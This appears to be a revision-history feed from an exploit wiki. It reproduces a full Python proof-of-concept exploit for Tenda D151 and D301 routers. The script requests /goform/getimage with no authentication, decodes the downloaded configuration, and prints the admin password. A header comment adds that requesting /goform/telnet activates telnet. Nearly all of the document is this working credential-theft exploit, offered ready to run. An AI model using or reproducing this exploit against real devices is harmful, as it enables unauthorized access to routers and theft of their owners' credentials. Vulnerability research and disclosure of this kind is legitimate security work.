https://pwnwiki.com/index.php?action=history&feed=atom&title=Tenda_D151_%26_D301_%E6%9C%AA%E7%B6%93%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BC%89%E6%BC%8F%E6%B4%9E
Tenda D151 & D301 未經身份驗證配置文件下載漏洞 - Revision history
2026-04-09T16:40:40Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Tenda_D151_%26_D301_%E6%9C%AA%E7%B6%93%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BC%89%E6%BC%8F%E6%B4%9E&diff=1849&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: Tenda D151 & D301 - Configuration Download (Unauthenticated) # Date: 19-04-2021 # Exploit Author: BenChaliah # Author link: https://github.com/B..."
2021-04-21T10:08:59Z
<p>Created page with "==EXP== <pre> # Exploit Title: Tenda D151 & D301 - Configuration Download (Unauthenticated) # Date: 19-04-2021 # Exploit Author: BenChaliah # Author link: https://github.com/B..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: Tenda D151 & D301 - Configuration Download (Unauthenticated)<br />
# Date: 19-04-2021<br />
# Exploit Author: BenChaliah<br />
# Author link: https://github.com/BenChaliah<br />
# Vendor Homepage: https://www.tendacn.com<br />
# Software Link: https://www.tendacn.com/us/download/detail-3331.html<br />
# Versions: <br />
# - D301 1.2.11.2_EN<br />
# - D301 V2.0 50.22.1.8_EN<br />
# - D151 V2.0 50.21.1.5_EN<br />
<br />
<br />
# --- Description --- #<br />
<br />
# This exploits allows for the download of the current router config including the admin login, just by requesting {IP}/goform/getimage,<br />
# you can also activate telnet service by requesting /goform/telnet. Telnet activation issue exists in many other tenda devices too.<br />
<br />
# --- Proof of concept --- #<br />
<br />
<br />
import struct<br />
import itertools<br />
import random, sys<br />
import requests<br />
import base64<br />
<br />
<br />
<br />
FETCH_CODE = "\x80\x0f\x07\xe7\x83i\xb0@v2\x9c\x8ef\x93y\xb8z"<br />
ADMIN_LOG_CFG = {'AdminPassword': 'admin', 'SupportPassword': 'support'}<br />
<br />
CLEAR_CODE = 256<br />
END_OF_CODE = CLEAR_CODE + 1<br />
<br />
MIN_WIDTH = 8<br />
DEFAULT_MIN_BITS = MIN_WIDTH + 1<br />
DEFAULT_MAX_BITS = 12<br />
<br />
<br />
<br />
<br />
def cmsDecoder(compressed_cfg):<br />
_cp_dict = dict((pt, struct.pack("B", pt)) for pt in range(256))<br />
_cp_dict[CLEAR_CODE] = CLEAR_CODE<br />
_cp_dict[END_OF_CODE] = END_OF_CODE<br />
prefix, offset, ignore = None, 0, 0<br />
codepoints_arr, remainder, bits = [], [], []<br />
<br />
init_csize = len(_cp_dict)<br />
<br />
codesize = init_csize<br />
minwidth = MIN_WIDTH<br />
while (1 << minwidth) < codesize:<br />
minwidth = minwidth + 1<br />
pointwidth = minwidth<br />
<br />
buts_arr = []<br />
for b in compressed_cfg:<br />
value = struct.unpack("B", b)[0]<br />
for bitplusone in range(8, 0, -1):<br />
bitindex = bitplusone - 1<br />
buts_arr.append(1 & (value >> bitindex))<br />
<br />
for nextbit in buts_arr:<br />
offset = (offset + 1) % 8<br />
if ignore > 0:<br />
ignore = ignore - 1<br />
continue<br />
bits.append(nextbit)<br />
if len(bits) == pointwidth:<br />
cp_int = 0<br />
lsb_first = [b for b in bits]<br />
lsb_first.reverse()<br />
for bit_index in range(len(lsb_first)):<br />
if lsb_first[bit_index]:<br />
cp_int = cp_int | (1 << bit_index)<br />
<br />
bits = []<br />
codepoints_arr.append(cp_int)<br />
codesize = codesize + 1<br />
if cp_int in [CLEAR_CODE, END_OF_CODE]:<br />
codesize = init_csize<br />
pointwidth = minwidth<br />
else:<br />
while codesize >= (2 ** pointwidth):<br />
pointwidth = pointwidth + 1<br />
if cp_int == END_OF_CODE:<br />
ignore = (8 - offset) % 8<br />
<br />
<br />
decodedBytes = []<br />
for cp_int in codepoints_arr:<br />
<br />
suffix = ""<br />
if cp_int == CLEAR_CODE:<br />
_cp_dict = dict((pt, struct.pack("B", pt)) for pt in range(256))<br />
_cp_dict[CLEAR_CODE] = CLEAR_CODE<br />
_cp_dict[END_OF_CODE] = END_OF_CODE<br />
prefix = None<br />
<br />
elif cp_int != END_OF_CODE:<br />
if cp_int in _cp_dict:<br />
suffix = _cp_dict[cp_int]<br />
if None != prefix:<br />
_cp_dict[len(_cp_dict)] = prefix + suffix[0]<br />
else:<br />
suffix = prefix + prefix[0]<br />
_cp_dict[len(_cp_dict)] = suffix<br />
prefix = suffix<br />
decoded = suffix<br />
for char in decoded:<br />
decodedBytes.append(char)<br />
return decodedBytes<br />
<br />
<br />
<br />
<br />
<br />
<br />
def exploit(ip):<br />
print "[!] Downloading config"<br />
try:<br />
r = requests.get("http://{}/goform/getimage".format(ip))<br />
pass<br />
except:<br />
print "[-] Failed to download the config, the target may not be vulnerable"<br />
<br />
BIN_CONTENT = r.content<br />
BIN_CONTENT = BIN_CONTENT[BIN_CONTENT.index(FETCH_CODE):][:16*50]<br />
<br />
CONFIG_XML = b"".join(cmsDecoder(BIN_CONTENT))<br />
<br />
USER_, PASS_ = "", ""<br />
for i in ADMIN_LOG_CFG.keys():<br />
if i in CONFIG_XML:<br />
CONFIG_XML = CONFIG_XML[CONFIG_XML.index(i) + len(i) + 1:]<br />
PASS_ = CONFIG_XML[:CONFIG_XML.index('</')]<br />
USER_ = ADMIN_LOG_CFG[i]<br />
print "\tusername: {}\n\tpassword: {}\n".format(USER_, base64.b64decode(PASS_).rstrip('\x00'))<br />
return 0<br />
print "[-] Failed to decode the config file\n"<br />
return -1<br />
<br />
<br />
<br />
if len(sys.argv) == 1:<br />
print "usage: python2 " + sys.argv[0] + " router_ip"<br />
print "example: python2 exploit.py http://192.168.1.1"<br />
exit()<br />
<br />
<br />
<br />
if __name__ == "__main__":<br />
<br />
print """\<br />
_ _<br />
___ (~ )( ~)<br />
/ \_\ \/ / <br />
| D_ ]\ \/ -- By BenCh@li@h<br />
| D _]/\ \ -- BenChaliah@github<br />
\___/ / /\ \\<br />
(_ )( _)<br />
<br />
"""<br />
<br />
try:<br />
exploit(sys.argv[1])<br />
except Exception as e:<br />
print str(e)<br />
<br />
</pre></div>
Pwnwiki